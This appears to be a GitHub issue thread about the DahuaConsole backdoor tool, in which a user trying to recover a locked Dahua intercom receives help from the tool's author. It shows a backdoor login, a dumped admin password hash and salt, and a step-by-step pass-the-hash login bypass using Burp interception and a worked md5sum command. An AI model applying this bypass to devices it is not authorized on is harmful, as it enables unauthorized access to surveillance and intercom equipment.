work well but frustrating...

[machinchose9999]

Hi, great work:

root@mfsbsd:~/DahuaConsole-master # ./Console.py --logon netkeyboard --rhost 192.168.1.11 --proto dhip --rport 5000
[*] [Dahua Debug Console 2019-2021 bashis <mcw noemail eu>]
[*] logon type "netkeyboard" with proto "dhip" at 192.168.1.11:5000
[+] Opening connection to 192.168.1.11 on port 5000: Done
[+] Dahua Debug Console: Success
[+] Login: Success
[+] keepAlive thread: Started
[*] [Active Users]
    admin@192.168.1.55 since 01-01-1970 01:47:17 with "NetKeyboard" (Id: 1)
[*] Remote Model: DHI-VTH5422HW, Class: VTH, Time: 1970-01-01 01:47:18

but so frustrating not being able to recover lost password or erase or getting an option to factory reset this crappy chinese intercom.....

I know your software is just intended to proove the backdoor effectiveness, but since dahua dosn't respond to password reset queries from europe I was expected your soft to be my last option ...

We can login as admin in the device, we can see hashed passwords:

[Console]# user -u
[02:31:38 trace Manager 2096 UserManager.cpp:2652]-------------
[02:31:38 trace Manager 2096 UserManager.cpp:2653]User Info
[02:31:38 trace Manager 2096 UserManager.cpp:2654]-------------
[02:31:38 info Manager 2096 UserManager.cpp:2661][
   {
      "Anonymous" : false,
      "AuthorityList" : [
         ..... boring .....
      ],
      "Group" : "admin",
      "Id" : 1,
      "Memo" : "admin's account",
      "Name" : "admin",
      "Password" : "617BC378D9407453D894213993E37F5C",
      "PasswordModifiedTime" : "01-01-1970 00:15:18",
      "PwdScore" : 35,
      "RandSalt" : "05f9d1bcf00863e6c80b0e0e143e22c8",
      "Reserved" : true,
      "Sharable" : true
   }
]

but no way to go further when an older person messed up the password ? any clue ?

[riogrande75]

Issue command "config all" - there you should get any password you've set either on the VTH (numbers to login on display) or password of your corresponding VTO.

[mcw0]

The reason for not adding simple password recovery functionality is to avoid misuse. But you have the essential MD5 hash (db_hash) to calculate the final MD5 hash.

Start a Burp suite session and intercept the communication from the moment you enter login and any password, copy the "random" value (dh_random) from the VTH, calculate the final hash according to this, and replace the "password" hash with the calculated one.

[machinchose9999]

Hello

I'm still puzzled: your code dos'nt care about password in md5 hashing... further more, I don't understand how to reinject the newly hashed string into the "users -u" json element "Password"... a third observation: the hash present in my "password" field is uppercase; nowhere in your python (I don't speak python, only C, sql, javascript and php), I can see the method to put one of these hash allcaps: does this dahua product use another variant not covered in your code ?

I must say, that since my last message, I had tried bruteforcing against the 617BC378D9407453D894213993E37F5C md5 (?) value with no luck (with the syntax "admin:05f9d1bcf00863e6c80b0e0e143e22c8:${passwd tested}" ) ; nothing matched so far..

and for @riogrande75 ; the "config all" give you only passwords you have entered for cameras and default passwords; nothing else... in my case at least.

[mcw0]

Okay, I understand. I'll go ahead and explain my thinking.
You can use the script to get access to the user hash. (user -u)

In this case: 617BC378D9407453D894213993E37F5C

Then, use Burp Suite to access the device with Burp's internal web browser w/o intercept.

You can enable Intercept again when you are at the login prompt.

Enter admin as username and whatever you want as password.

Forward the first request, and record the "random" from the response.
Example:

Then calculate the final hash with:

$ echo -en "admin:1095675801:617BC378D9407453D894213993E37F5C" | md5sum
5afe73ab4a3bb0d3762bb999f7eba52e -

Replace the hash in Burp.

You should get in. Remember you will not be able to change the password of the admin as you need to know it, but you could create a new admin.

[machinchose9999]

Hi, thank so much for this method and the time spend to explain this bypass.
Unfortunately this device is a "VTH" aka a remote screen (sip client) to a doorbell server ("VTO" in dahua terminology). VTH has no web channel opened; the only accessible port is the "DHIP" on tcp/37777 (at least when setup had been done) usable with the infamous VDPconfig.
My brute force lead to nothing but still not sure what I was searching for ;-)

Thanks for your time; I'll sent back this monitor to warrantly: it's unusable after all....

PS: for thoses aware of CVE-2017-6341 CVE-2017-6342 CVE-2017-6343; this mishandling is closed or not applicable on this device's firmware.

[mcw0]

Ah, yes, you are right. Forgot that VTH only uses DVRIP protocol on TCP/37777... But, why not "simply" factory default all of your stuff and record the username/password instead of sending it back?

[MarcinWad]

There is a way to REPLACE current not known password with new one. But using modified DHConsole to make special data packet.

[patrykkolek]

There is a way to REPLACE current not known password with new one. But using modified DHConsole to make special data packet.

@MarcinWad can you tell more ? i want to learn somethng new :D

[plouflechien]

@mcw0 sorry for late reply: for this particular device; factory reset is handled by dahua only: no reset switch, no way to recover someone who misbehave with configuration (the config tool that's said to be abble to configure the device simply let's enter an alpha-numeric password where a pin is asked, and so on.. ). One of my familly member screwed the configuration of this device and no way to recover ... My last try will be desoldering the spi eprom to erase it, and hopes the console restart like a factory reset when replaced... (I'm not in hurry to test such a dummy thing...)